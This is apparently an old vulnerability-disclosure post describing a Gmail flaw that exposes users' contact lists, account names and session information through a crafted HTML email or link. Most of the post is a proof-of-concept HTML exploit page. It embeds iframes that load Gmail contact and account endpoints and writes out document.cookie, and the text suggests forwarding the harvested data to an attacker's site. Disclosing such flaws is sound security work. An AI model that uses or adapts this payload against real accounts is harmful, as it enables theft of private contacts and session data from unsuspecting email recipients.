hello:
after found a bug in gmail ,i variable 'zx' few time ago i say gmail
reveal contact list to remote users,discloses account name,and gain
acces to account if cookie if active and whith some url can list
contacts labels or other information for sending to atacker´s web
site:
a situation o a proff of concept :
1 send a mail to gmail´s account information is the same...(not
spamming please :D)
2- in this email you send in html format and you can make two actions:
2.1 including code in html of this email (mail.html)
2.2 send a link and wait for users click on ...
if the gmails cookie if active and the user click on,any user can view
this information and can use it or send to ther sites via web form
others
Sample of Mail.html
<html>
<head>
<title>Gmail disclosure informatio Xploit</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>
<body>
<table width="80%" border="0" align="center">
<tr>
<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>
<iframe height="100%" id="iframe" width="100%"
frameborder="0"
src="http://gmail.google.com/gmail?view=page&name=contacts&ver="
></iframe>
</h5></td>
</tr>
<tr>
<td height="21"> <h5><strong>user´s
name
account</strong><script>document.write(document.cookie)</script>
<iframe height="100%" id="iframe" width="100%"
frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="
></iframe>
</h5></td>
</tr>
<tr>
<td height="48"> <h5> user account options
<iframe height="100%" id="iframe" width="100%"
frameborder="0"
src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>
</h5></td>
</tr>
<tr>
<td height="48"><script>document.write(document.cookie)</script> </td>
</tr>
</table>
</body>
</html>
atentamente:
Lostmon (Lostmon@gmail.com)
--
La curiosidad es lo que hace mover la mente....
Posts
